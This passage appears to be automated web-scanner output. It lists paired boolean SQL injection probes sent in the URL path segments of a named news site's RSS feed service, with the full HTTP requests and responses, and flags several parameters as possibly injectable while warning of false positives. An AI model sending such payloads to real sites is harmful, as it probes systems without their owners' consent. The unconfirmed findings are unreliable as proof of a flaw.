GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:34 GMT Date: Tue, 07 Dec 2010 23:20:34 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:34 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12983011'%20or%201%3d1--%20 and 12983011'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d1--%20/568/200782.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:40 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d2--%20/568/200782.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:40 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13540988'%20or%201%3d1--%20 and 13540988'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi13540988'%20or%201%3d1--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi13540988'%20or%201%3d2--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:30 GMT Date: Tue, 07 Dec 2010 23:20:30 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 39771848%20or%201%3d1--%20 and 39771848%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d1--%20/200783.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:40 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d2--%20/200783.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:40 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:49 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:50 GMT Date: Tue, 07 Dec 2010 23:20:50 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14698078'%20or%201%3d1--%20 and 14698078'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi14698078'%20or%201%3d1--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:45 GMT Date: Tue, 07 Dec 2010 23:20:45 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi14698078'%20or%201%3d2--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:45 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10825379'%20or%201%3d1--%20 and 10825379'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi10825379'%20or%201%3d1--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:37 GMT Date: Tue, 07 Dec 2010 23:20:37 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi10825379'%20or%201%3d2--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:38 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200786.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:51 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200786.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:51 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13847561'%20or%201%3d1--%20 and 13847561'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d1--%20/568/200789.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:46 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d2--%20/568/200789.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:46 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200792.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:03 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200792.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
